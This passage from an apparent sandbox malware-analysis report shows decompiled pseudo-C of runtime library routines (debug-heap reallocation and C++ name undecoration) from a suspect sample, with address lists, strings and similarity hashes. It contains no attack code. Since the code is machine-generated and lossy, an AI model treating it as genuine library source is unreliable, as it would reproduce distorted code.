														E0095AF80(_t288, _v20 + _v12[5], 0xcd,  *_a8 - _v12[5]);
														_t294 = _t294 + 0xc;
													}
													E0095AF80(_t288, _v20 +  *_a8, 0xfd, 4);
													_t295 = _t294 + 0xc;
													__eflags = _v5 & 0x000000ff;
													if((_v5 & 0x000000ff) == 0) {
														_v12[2] = _a16;
														_v12[3] = _a20;
														_v12[6] = _v24;
													}
													_v12[5] =  *_a8;
													__eflags = _a24 & 0x000000ff;
													if((_a24 & 0x000000ff) != 0) {
														L72:
														__eflags = _v12 - _v16;
														if(_v12 == _v16) {
															L74:
															return _v20;
														}
														__eflags = _v5 & 0x000000ff;
														if((_v5 & 0x000000ff) == 0) {
															__eflags =  *_v12;
															if( *_v12 == 0) {
																_t257 =  *0xb306e8; // 0xe7f2d8
																__eflags = _t257 - _v16;
																if(__eflags != 0) {
																	_t160 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\debug_heap.cpp", 0x2c5, 0, L"%ls", L"__acrt_last_block == old_head");
																	_t295 = _t295 + 0x18;
																	__eflags = _t160 - 1;
																	if(_t160 == 1) {
																		asm("int3");
																	}
																}
																 *0xb306e8 = _v12[1];
															} else {
																 *( *_v12 + 4) = _v12[1];
															}
															_t153 = _v12;
															__eflags =  *(_t153 + 4);
															if( *(_t153 + 4) == 0) {
																_t259 =  *0xb306e4; // 0xe83700
																__eflags = _t259 - _v16;
																if(__eflags != 0) {
																	_t158 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\debug_heap.cpp", 0x2cf, 0, L"%ls", L"__acrt_first_block == old_head");
																	__eflags = _t158 - 1;
																	if(_t158 == 1) {
																		asm("int3");
																	}
																}
																 *0xb306e4 =  *_v12;
															} else {
																 *(_v12[1]) =  *_v12;
															}
															__eflags =  *0xb306e4;
															if( *0xb306e4 == 0) {
																 *0xb306e8 = _v12;
															} else {
																_t157 =  *0xb306e4; // 0xe83700
																 *((intOrPtr*)(_t157 + 4)) = _v12;
															}
															_t221 =  *0xb306e4; // 0xe83700
															 *_v12 = _t221;
															_v12[1] = 0;
															 *0xb306e4 = _v12;
															return _v20;
														}
														goto L74;
													} else {
														__eflags = _a24 & 0x000000ff;
														if(__eflags != 0) {
															L70:
															_t162 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\debug_heap.cpp", 0x2b8, 0, L"%ls", L"reallocation_is_allowed || (!reallocation_is_allowed && new_head == old_head)");
															_t295 = _t295 + 0x18;
															__eflags = _t162 - 1;
															if(_t162 == 1) {
																asm("int3");
															}
															goto L72;
														}
														__eflags = _v12 - _v16;
														if(__eflags == 0) {
															goto L72;
														}
														goto L70;
													}
												}
												return 0;
											}
											_t176 = E009A9820(_t211, _v16, _v32);
											_t293 = _t292 + 8;
											_v12 = _t176;
											__eflags = _v12;
											if(_v12 != 0) {
												goto L55;
											}
											return 0;
										}
										 *((intOrPtr*)(L00992F70(_t210))) = 0xc;
										return 0;
									}
									__eflags =  *(_v16 + 0x18);
									if(__eflags == 0) {
										goto L42;
									}
									goto L40;
								}
							}
							_t239 = _a4;
							_t186 = L009948E0(__eflags, 1, 0, 0, 0, "The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()", _a4);
							__eflags = _t186 - 1;
							if(_t186 == 1) {
								asm("int3");
							}
							 *((intOrPtr*)(L00992F70(_t239))) = 0x16;
							return 0;
						}
						__eflags = (_a12 & 0x0000ffff) - 4;
						if((_a12 & 0x0000ffff) == 4) {
							goto L27;
						}
						__eflags = (_a12 & 0x0000ffff) - 2;
						if((_a12 & 0x0000ffff) == 2) {
							goto L27;
						}
						__eflags = _a16;
						if(__eflags == 0) {
							_t191 = L009948E0(__eflags, 1, 0, 0, 0, "%s", "Error: memory allocation: bad memory block type.\n");
							_t290 = _t289 + 0x18;
							__eflags = _t191 - 1;
							if(_t191 == 1) {
								asm("int3");
							}
						} else {
							_push(_a20);
							_t192 = L009948E0(__eflags, 1, 0, 0, 0, "Error: memory allocation: bad memory block type.\n\nMemory allocated at %hs(%d).\n", _a16);
							_t290 = _t289 + 0x1c;
							__eflags = _t192 - 1;
							if(_t192 == 1) {
								asm("int3");
							}
						}
						goto L31;
					}
					_t195 =  *0xa06244; // 0x9acb50
					_v28 = _t195;
					_t207 = _v28;
					 *0x9d62b0(2, _a4,  *_a8, _a12, _v24, _a16, _a20);
					_t197 = _v28();
					_t289 = _t289 + 0x1c;
					__eflags = _t197;
					if(_t197 != 0) {
						goto L17;
					}
					__eflags = _a16;
					if(__eflags == 0) {
						_t198 = L009948E0(__eflags, 0, 0, 0, 0, "%s", "Client hook re-allocation failure.\n");
						__eflags = _t198 - 1;
						if(_t198 == 1) {
							asm("int3");
						}
						L16:
						return 0;
					}
					_push(_a20);
					_t200 = L009948E0(__eflags, 0, 0, 0, 0, "Client hook re-allocation failure at file %hs line %d.\n", _a16);
					__eflags = _t200 - 1;
					if(_t200 == 1) {
						asm("int3");
					}
					goto L16;
				} else {
					__eflags =  *_a8;
					if(__eflags != 0) {
						goto L5;
					} else {
						L00999480(__eflags, _a4, _a12);
						return 0;
					}
				}
			}

























































                      0x00997560
                      0x0099756c
                      0x00000000
                      0x00997585
                      0x00997591
                      0x00997593
                      0x009975b4
                      0x009975b4
                      0x009975b9
                      0x009975be
                      0x009975c1
                      0x009975c8
                      0x009975cd
                      0x009975d3
                      0x009975d5
                      0x009975d5
                      0x009975d3
                      0x009975d6
                      0x009975dd
                      0x0099766c
                      0x0099766c
                      0x00997670
                      0x009976da
                      0x009976de
                      0x009976e3
                      0x009976e9
                      0x009976eb
                      0x0099771e
                      0x00997722
                      0x00997727
                      0x0099772a
                      0x0099772c
                      0x00997746
                      0x0099774b
                      0x0099774e
                      0x00997751
                      0x00997753
                      0x00997753
                      0x00997751
                      0x00997758
                      0x0099775d
                      0x00997760
                      0x00997763
                      0x00997766
                      0x0099776a
                      0x00997772
                      0x0099776c
                      0x0099776c
                      0x0099776c
                      0x00997779
                      0x00997780
                      0x00997782
                      0x009977c4
                      0x009977ca
                      0x009977cd
                      0x00000000
                      0x00000000
                      0x009977e0
                      0x009977e8
                      0x009977eb
                      0x009977ed
                      0x009977ed
                      0x009977f3
                      0x00000000
                      0x00997784
                      0x00997787
                      0x0099778e
                      0x00997799
                      0x009977b1
                      0x009977b6
                      0x009977b9
                      0x009977bc
                      0x009977be
                      0x009977be
                      0x009977bf
                      0x00997800
                      0x00997800
                      0x00997803
                      0x00997806
                      0x00997822
                      0x00997825
                      0x0099782c
                      0x00997830
                      0x00997832
                      0x0099785e
                      0x00997863
                      0x00997866
                      0x00997869
                      0x0099786d
                      0x00997876
                      0x00997876
                      0x0099787e
                      0x00997883
                      0x00997887
                      0x00997889
                      0x0099788f
                      0x00997896
                      0x0099789b
                      0x009978a3
                      0x009978b4
                      0x009978b6
                      0x009978c2
                      0x009978b8
                      0x009978bd
                      0x009978bd
                      0x009978c9
                      0x009978cf
                      0x009978cf
                      0x009978d2
                      0x009978d2
                      0x009978db
                      0x009978e4
                      0x009978ed
                      0x009978f4
                      0x009978f9
                      0x009978ff
                      0x00997905
                      0x00997907
                      0x0099790d
                      0x0099790d
                      0x00997905
                      0x00997917
                      0x0099791c
                      0x0099791f
                      0x00997925
                      0x0099792a
                      0x0099792d
                      0x00997946
                      0x0099794a
                      0x0099794f
                      0x0099794f
                      0x00997962
                      0x00997967
                      0x0099796e
                      0x00997970
                      0x00997978
                      0x00997981
                      0x0099798a
                      0x0099798a
                      0x00997995
                      0x0099799c
                      0x0099799e
                      0x009979d6
                      0x009979d9
                      0x009979dc
                      0x009979e6
                      0x00000000
                      0x009979e6
                      0x009979e2
                      0x009979e4
                      0x009979f1
                      0x009979f4
                      0x00997a06
                      0x00997a0c
                      0x00997a0f
                      0x00997a29
                      0x00997a2e
                      0x00997a31
                      0x00997a34
                      0x00997a36
                      0x00997a36
                      0x00997a34
                      0x00997a3d
                      0x009979f6
                      0x00997a01
                      0x00997a01
                      0x00997a43
                      0x00997a46
                      0x00997a4a
                      0x00997a5b
                      0x00997a61
                      0x00997a64
                      0x00997a7e
                      0x00997a86
                      0x00997a89
                      0x00997a8b
                      0x00997a8b
                      0x00997a89
                      0x00997a91
                      0x00997a4c
                      0x00997a57
                      0x00997a57
                      0x00997a97
                      0x00997a9e
                      0x00997ab0
                      0x00997aa0
                      0x00997aa0
                      0x00997aa8
                      0x00997aa8
                      0x00997ab9
                      0x00997abf
                      0x00997ac4
                      0x00997ace
                      0x00000000
                      0x00997ad3
                      0x00000000
                      0x009979a0
                      0x009979a4
                      0x009979a6
                      0x009979b0
                      0x009979c8
                      0x009979cd
                      0x009979d0
                      0x009979d3
                      0x009979d5
                      0x009979d5
                      0x00000000
                      0x009979d3
                      0x009979ab
                      0x009979ae
                      0x00000000
                      0x00000000
                      0x00000000
                      0x009979ae
                      0x0099799e
                      0x00000000
                      0x0099786f
                      0x0099783c
                      0x00997841
                      0x00997844
                      0x00997847
                      0x0099784b
                      0x00000000
                      0x00997854
                      0x00000000
                      0x0099784d
                      0x0099780d
                      0x00000000
                      0x00997813
                      0x00997793
                      0x00997797
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00997797
                      0x00997782
                      0x009976ed
                      0x009976fe
                      0x00997706
                      0x00997709
                      0x0099770b
                      0x0099770b
                      0x00997711
                      0x00000000
                      0x00997717
                      0x0099767b
                      0x0099767e
                      0x00000000
                      0x00000000
                      0x00997688
                      0x0099768b
                      0x00000000
                      0x00000000
                      0x0099768d
                      0x00997691
                      0x009976ca
                      0x009976cf
                      0x009976d2
                      0x009976d5
                      0x009976d7
                      0x009976d7
                      0x00997693
                      0x00997696
                      0x009976a8
                      0x009976ad
                      0x009976b0
                      0x009976b3
                      0x009976b5
                      0x009976b5
                      0x009976b6
                      0x00000000
                      0x009976d8
                      0x009975ff
                      0x00997604
                      0x00997607
                      0x0099760a
                      0x00997610
                      0x00997613
                      0x00997616
                      0x00997618
                      0x00000000
                      0x00000000
                      0x0099761a
                      0x0099761e
                      0x00997657
                      0x0099765f
                      0x00997662
                      0x00997664
                      0x00997664
                      0x00997665
                      0x00000000
                      0x00997665
                      0x00997623
                      0x00997635
                      0x0099763d
                      0x00997640
                      0x00997642
                      0x00997642
                      0x00000000
                      0x00997595
                      0x00997598
                      0x0099759b
                      0x00000000
                      0x0099759d
                      0x009975a5
                      0x00000000
                      0x009975ad
                      0x0099759b

                      APIs
                      Strings
                      • Error: possible heap corruption at or near 0x%p, xrefs: 009977D3
                      • %ls, xrefs: 00997733, 0099779E, 009979B5, 00997A16, 00997A6B
                      • __acrt_last_block == old_head, xrefs: 00997A11
                      • reallocation_is_allowed || (!reallocation_is_allowed && new_head == old_head), xrefs: 009979B0
                      • old_head->_line_number == line_number_for_ignore_blocks && old_head->_request_number == request_number_for_ignore_blocks, xrefs: 00997799
                      • Error: memory allocation: bad memory block type., xrefs: 009976B8
                      • _CrtIsValidHeapPointer(block), xrefs: 0099772E
                      • Error: memory allocation: bad memory block type.Memory allocated at %hs(%d)., xrefs: 0099769B
                      • Client hook re-allocation failure., xrefs: 00997645
                      • minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp, xrefs: 0099773F, 009977AA, 009979C1, 00997A22, 00997A77
                      • __acrt_first_block == old_head, xrefs: 00997A66
                      • The Block at 0x%p was allocated by aligned routines, use _aligned_realloc(), xrefs: 009976F1
                      • Client hook re-allocation failure at file %hs line %d., xrefs: 00997628
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: __wcstombs_l
                      • String ID: %ls$Client hook re-allocation failure at file %hs line %d.$Client hook re-allocation failure.$Error: memory allocation: bad memory block type.$Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).$Error: possible heap corruption at or near 0x%p$The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()$_CrtIsValidHeapPointer(block)$__acrt_first_block == old_head$__acrt_last_block == old_head$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$old_head->_line_number == line_number_for_ignore_blocks && old_head->_request_number == request_number_for_ignore_blocks$reallocation_is_allowed || (!reallocation_is_allowed && new_head == old_head)
                      • API String ID: 3007373345-458177602
                      • Opcode ID: fed17884296d1d8e48121dab35792b1a79797c48c3f7c0805d3a8020500ad779
                      • Instruction ID: 14fac237d3a29ddef909c382444d5f1081d1711e5db3d32415cf6936d8d43b4a
                      • Opcode Fuzzy Hash: fed17884296d1d8e48121dab35792b1a79797c48c3f7c0805d3a8020500ad779
                      • Instruction Fuzzy Hash: 3602CD74A24209EFDF14DF98C882FAEB7B5BF94708F208548E8149B381DB70E941CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00968210 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 185COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00968210(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v5;
				signed int _v6;
				signed char _v7;
				signed char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v28;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v52;
				char _v60;
				char _v68;
				char* _t60;
				char* _t66;
				void* _t67;
				char _t75;
				intOrPtr _t81;
				void* _t83;
				intOrPtr _t85;
				void* _t90;
				intOrPtr _t97;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr _t118;
				char* _t121;
				char* _t122;
				char* _t123;
				intOrPtr _t124;
				char* _t126;
				intOrPtr _t129;
				void* _t138;
				void* _t139;
				void* _t140;

				_t139 = __esi;
				_t138 = __edi;
				_t90 = __ebx;
				_v6 = 1;
				E0095F3F0( &_v36);
				 *0xb3064d = 1;
				while(E0096AB70( &_v36) == 0) {
					_t60 =  *0xb30640; // 0x0
					if( *_t60 == 0) {
						break;
					}
					_t121 =  *0xb30640; // 0x0
					if( *_t121 == 0x40) {
						break;
					}
					_v7 = 0;
					if((_v6 & 0x000000ff) == 0) {
						_v7 = 1;
					} else {
						_v6 = 0;
					}
					_t122 =  *0xb30640; // 0x0
					_v16 =  *_t122 - 0x30;
					E0095F3F0( &_v28);
					_v8 = 0;
					if(_v16 < 0 || _v16 > 9) {
						_t97 =  *0xb30640; // 0x0
						_v20 = _t97;
						_t123 =  *0xb30640; // 0x0
						if( *_t123 != 0x24) {
							L21:
							_t66 =  *0xb30640; // 0x0
							if( *_t66 != 0x24) {
								L24:
								_t67 = E00968D00(_t90, _t138, _t139,  &_v68);
								_t140 = _t140 + 4;
								E0095F820( &_v28, _t67);
								L25:
								_t124 =  *0xb30640; // 0x0
								if(_t124 - _v20 > 1) {
									_t109 =  *0xb3063c; // 0x0
									if(E0096A590(_t109) == 0) {
										_t110 =  *0xb3063c; // 0x0
										L0095FF70(_t110,  &_v28);
									}
								}
								goto L28;
							}
							_t81 =  *0xb30640; // 0x0
							if( *((char*)(_t81 + (1 << 0))) == 0x24) {
								goto L24;
							}
							_t129 =  *0xb30640; // 0x0
							 *0xb30640 = _t129 + 1;
							_t83 = E009686C0(_t90, _t138, _t139,  &_v60);
							_t140 = _t140 + 4;
							E0095F820( &_v28, _t83);
							goto L25;
						}
						_t113 =  *0xb30640; // 0x0
						if( *((char*)(_t113 + 1)) != 0x24) {
							goto L21;
						}
						_v5 = 0;
						_t85 =  *0xb30640; // 0x0
						_v12 =  *((char*)(_t85 + 2));
						_v12 = _v12 - 0x24;
						if(_v12 > 0x36) {
							L19:
							if((_v5 & 0x000000ff) == 0) {
								goto L21;
							} else {
								continue;
							}
						}
						_t25 = _v12 + 0x9684bc; // 0xcccccc02
						switch( *((intOrPtr*)(( *_t25 & 0x000000ff) * 4 +  &M009684A8))) {
							case 0:
								__edx =  *0xb30640;
								__eax =  *((char*)(__edx + 3));
								if( *((char*)(__edx + 3)) == 0x56) {
									__ecx =  *0xb30640; // 0x0
									__ecx = __ecx + 4;
									 *0xb30640 = __ecx;
									_v5 = 1;
								}
								goto L19;
							case 1:
								 *0xb30640 =  *0xb30640 + 3;
								 *0xb30640 =  *0xb30640 + 3;
								goto L19;
							case 2:
								__ecx =  *0xb30640;
								__ecx =  *0xb30640 + 3;
								 *0xb30640 = __ecx;
								_v5 = 1;
								goto L19;
							case 3:
								_v8 = 1;
								_t135 =  *0xb30640; // 0x0
								 *0xb30640 = _t135 + 3;
								goto L19;
							case 4:
								goto L19;
						}
					} else {
						_t116 =  *0xb30640; // 0x0
						 *0xb30640 = _t116 + 1;
						_t118 =  *0xb3063c; // 0x0
						E0095F820( &_v28, E0095F9A0(_t118,  &_v52, _v16));
						L28:
						if(E0096A560( &_v28) != 0) {
							if(E0096A6C0( &_v28) != 0) {
								L36:
								continue;
							}
							E0095F350(_a4, 2);
							return _a4;
						}
						if((_v7 & 0x000000ff) != 0) {
							E0095FDE0( &_v36, 0x2c);
						}
						_t126 =  &_v28;
						E0095FD40( &_v36, _t126);
						if((_v8 & 0x000000ff) != 0) {
							_t75 = E00960060("...", 3);
							_t140 = _t140 + 8;
							_v44 = _t75;
							_v40 = _t126;
							E0095FCA0( &_v36,  &_v44);
						}
						goto L36;
					}
				}
				 *0xb3064d = 0;
				E0095F240(_a4,  &_v36);
				return _a4;
			}








































                      0x00968210
                      0x00968210
                      0x00968210
                      0x00968216
                      0x0096821d
                      0x00968222
                      0x00968229
                      0x00968239
                      0x00968243
                      0x00000000
                      0x00000000
                      0x00968249
                      0x00968255
                      0x00000000
                      0x00000000
                      0x0096825b
                      0x00968265
                      0x0096826d
                      0x00968267
                      0x00968267
                      0x00968267
                      0x00968271
                      0x0096827d
                      0x00968283
                      0x00968288
                      0x00968290
                      0x009682c8
                      0x009682ce
                      0x009682d1
                      0x009682dd
                      0x0096838e
                      0x0096838e
                      0x00968399
                      0x009683d7
                      0x009683db
                      0x009683e0
                      0x009683e7
                      0x009683ec
                      0x009683ec
                      0x009683f8
                      0x009683fa
                      0x00968407
                      0x0096840d
                      0x00968413
                      0x00968413
                      0x00968407
                      0x00000000
                      0x009683f8
                      0x009683a3
                      0x009683af
                      0x00000000
                      0x00000000
                      0x009683b1
                      0x009683ba
                      0x009683c4
                      0x009683c9
                      0x009683d0
                      0x00000000
                      0x009683d0
                      0x009682e3
                      0x009682f0
                      0x00000000
                      0x00000000
                      0x009682f6
                      0x009682fa
                      0x00968303
                      0x0096830c
                      0x00968313
                      0x00968381
                      0x00968387
                      0x00000000
                      0x00968389
                      0x00000000
                      0x00968389
                      0x00968387
                      0x00968318
                      0x0096831f
                      0x00000000
                      0x0096835f
                      0x00968365
                      0x0096836c
                      0x0096836e
                      0x00968374
                      0x00968377
                      0x0096837d
                      0x0096837d
                      0x00000000
                      0x00000000
                      0x00968340
                      0x00968343
                      0x00000000
                      0x00000000
                      0x0096834a
                      0x00968350
                      0x00968353
                      0x00968359
                      0x00000000
                      0x00000000
                      0x00968326
                      0x0096832a
                      0x00968333
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00968298
                      0x00968298
                      0x009682a1
                      0x009682af
                      0x009682be
                      0x00968418
                      0x00968422
                      0x00968477
                      0x00968488
                      0x00000000
                      0x00968488
                      0x0096847e
                      0x00000000
                      0x00968483
                      0x0096842a
                      0x00968431
                      0x00968431
                      0x00968436
                      0x0096843d
                      0x00968448
                      0x00968451
                      0x00968456
                      0x00968459
                      0x0096845c
                      0x00968466
                      0x00968466
                      0x00000000
                      0x0096846b
                      0x00968290
                      0x0096848d
                      0x0096849b
                      0x00000000

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Mailbox$Iterator_baseIterator_base::_Name::isstd::_$EmptyFullNameName::Name::operator+=Replicator::isReplicator::operator+=Valid
                      • String ID: ...$6
                      • API String ID: 2413373717-4106199456
                      • Opcode ID: a68552bc105b0135818531e5104d032d5543ce7e00cbb7f00be6ac7eff09dbac
                      • Instruction ID: cafe41f3f586c5798aa29962bcd025a8a884bae9e5f34be6569581a2312fad93
                      • Opcode Fuzzy Hash: a68552bc105b0135818531e5104d032d5543ce7e00cbb7f00be6ac7eff09dbac
                      • Instruction Fuzzy Hash: 237128B0904155DFDB04EF94D8B2BBF7BB4BF81304F2882A9D40667265DF349945CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00964900 Relevance: 24.2, APIs: 16, Instructions: 187COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 96%
                      			E00964900(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed char _a8) {
				signed int _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v80;
				char _v88;
				char _v96;
				char _v104;
				char _v112;
				char _v120;
				char _v128;
				char _v136;
				char _v144;
				char _v152;
				char _v160;
				char _v168;
				char* _t70;
				char* _t71;
				intOrPtr* _t81;
				char* _t99;
				void* _t113;
				char* _t136;
				intOrPtr _t137;
				char* _t142;
				char* _t146;
				char* _t147;
				intOrPtr _t149;
				char _t157;
				intOrPtr _t160;
				intOrPtr _t163;
				void* _t165;
				void* _t166;

				_t166 = __esi;
				_t165 = __edi;
				_t113 = __ebx;
				_v5 = 0;
				_t70 =  *0xb30640; // 0x0
				if( *_t70 == 0x51) {
					_v5 = 1;
					_t163 =  *0xb30640; // 0x0
					 *0xb30640 = _t163 + 1;
				}
				_t71 =  *0xb30640; // 0x0
				if( *_t71 != 0) {
					_t146 =  *0xb30640; // 0x0
					if( *_t146 < 0x30) {
						L10:
						E00969C90( &_v80);
						if((E0095FA10( &_v80) & 0x000000ff) == 0) {
							_t147 =  *0xb30640; // 0x0
							if( *_t147 != 0) {
								_v32 = E0095F350( &_v168, 2);
							} else {
								_v32 = E0095F350( &_v160, 1);
							}
							_v48 = _v32;
							E0095F240(_a4, _v48);
							return _a4;
						}
						_t149 =  *0xb30640; // 0x0
						 *0xb30640 = _t149 + 1;
						_t81 = E0095FA30( &_v80);
						_v16 =  *_t81;
						_v12 =  *((intOrPtr*)(_t81 + 4));
						if((_a8 & 0x000000ff) == 0) {
							if((_v5 & 0x000000ff) == 0) {
								_v28 = E0095F510(_t113,  &_v152, _t165, _t166, _v16, _v12);
							} else {
								_v28 = E0095FAA0( &_v144, 0xa06030, E0095F510(_t113,  &_v136, _t165, _t166, _v16, _v12));
							}
							_v44 = _v28;
							E0095F240(_a4, _v44);
							return _a4;
						}
						if((_v5 & 0x000000ff) == 0) {
							_v24 = E0095F420(_t113,  &_v128, _t165, _t166, _v16, _v12);
						} else {
							_v24 = E0095FAA0( &_v120, 0xa06030, E0095F420(_t113,  &_v112, _t165, _t166, _v16, _v12));
						}
						_v40 = _v24;
						E0095F240(_a4, _v40);
						return _a4;
					}
					_t136 =  *0xb30640; // 0x0
					_t157 =  *_t136;
					if(_t157 > 0x39) {
						goto L10;
					}
					if((_v5 & 0x000000ff) == 0) {
						_t99 =  *0xb30640; // 0x0
						asm("cdq");
						_v64 =  *_t99 - 0x2f;
						_v60 = _t157;
						_t137 =  *0xb30640; // 0x0
						 *0xb30640 = _t137 + 1;
						_v20 = E0095F510(_t113,  &_v104, _t165, _t166, _v64, _v60);
					} else {
						_t142 =  *0xb30640; // 0x0
						asm("cdq");
						_v56 =  *_t142 - 0x2f;
						_v52 = _t157;
						_t160 =  *0xb30640; // 0x0
						 *0xb30640 = _t160 + 1;
						_v20 = E0095FAA0( &_v96, 0xa06030, E0095F510(_t113,  &_v88, _t165, _t166, _v56, _v52));
					}
					_v36 = _v20;
					E0095F240(_a4, _v36);
					return _a4;
				} else {
					E0095F350(_a4, 1);
					return _a4;
				}
			}














































                      0x00964900
                      0x00964900
                      0x00964900
                      0x00964909
                      0x0096490d
                      0x00964918
                      0x0096491a
                      0x0096491e
                      0x00964927
                      0x00964927
                      0x0096492d
                      0x00964937
                      0x0096494b
                      0x00964957
                      0x00964a0e
                      0x00964a12
                      0x00964a27
                      0x00964b17
                      0x00964b22
                      0x00964b43
                      0x00964b24
                      0x00964b31
                      0x00964b31
                      0x00964b49
                      0x00964b53
                      0x00000000
                      0x00964b58
                      0x00964a2d
                      0x00964a36
                      0x00964a3f
                      0x00964a49
                      0x00964a4c
                      0x00964a55
                      0x00964abb
                      0x00964afd
                      0x00964abd
                      0x00964ae5
                      0x00964ae5
                      0x00964b03
                      0x00964b0d
                      0x00000000
                      0x00964b12
                      0x00964a5d
                      0x00964a96
                      0x00964a5f
                      0x00964a81
                      0x00964a81
                      0x00964a9c
                      0x00964aa6
                      0x00000000
                      0x00964aab
                      0x0096495d
                      0x00964963
                      0x00964969
                      0x00000000
                      0x00000000
                      0x00964975
                      0x009649c0
                      0x009649cb
                      0x009649cc
                      0x009649cf
                      0x009649d2
                      0x009649db
                      0x009649f1
                      0x00964977
                      0x00964977
                      0x00964983
                      0x00964984
                      0x00964987
                      0x0096498a
                      0x00964993
                      0x009649bb
                      0x009649bb
                      0x009649f7
                      0x00964a01
                      0x00000000
                      0x00964939
                      0x0096493e
                      0x00000000
                      0x00964943

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 0096493E
                      • operator+.LIBVCRUNTIMED ref: 009649B3
                        • Part of subcall function 0095FAA0: DName::operator+.LIBCMTD ref: 0095FAC0
                      • DName::DName.LIBVCRUNTIMED ref: 009649A4
                        • Part of subcall function 0095F510: __aullrem.LIBCMT ref: 0095F557
                        • Part of subcall function 0095F510: __aulldiv.LIBCMT ref: 0095F570
                      • DName::DName.LIBVCRUNTIMED ref: 009649EC
                      • Mailbox.LIBCMTD ref: 00964A01
                      • DName::DName.LIBVCRUNTIMED ref: 00964A6A
                      • operator+.LIBVCRUNTIMED ref: 00964A79
                      • DName::DName.LIBVCRUNTIMED ref: 00964A91
                      • Mailbox.LIBCMTD ref: 00964AA6
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: NameName::$Mailboxoperator+$Name::operator+__aulldiv__aullrem
                      • String ID:
                      • API String ID: 2030757049-0
                      • Opcode ID: 0d0b220e0f8b09586a73f43e3fdcb49fc1c40617df8914d65be43f83bf70a7d6
                      • Instruction ID: 23784c7a18c2ea738adf2ac43f344d4722e62fce9109669ba9a382358b052909
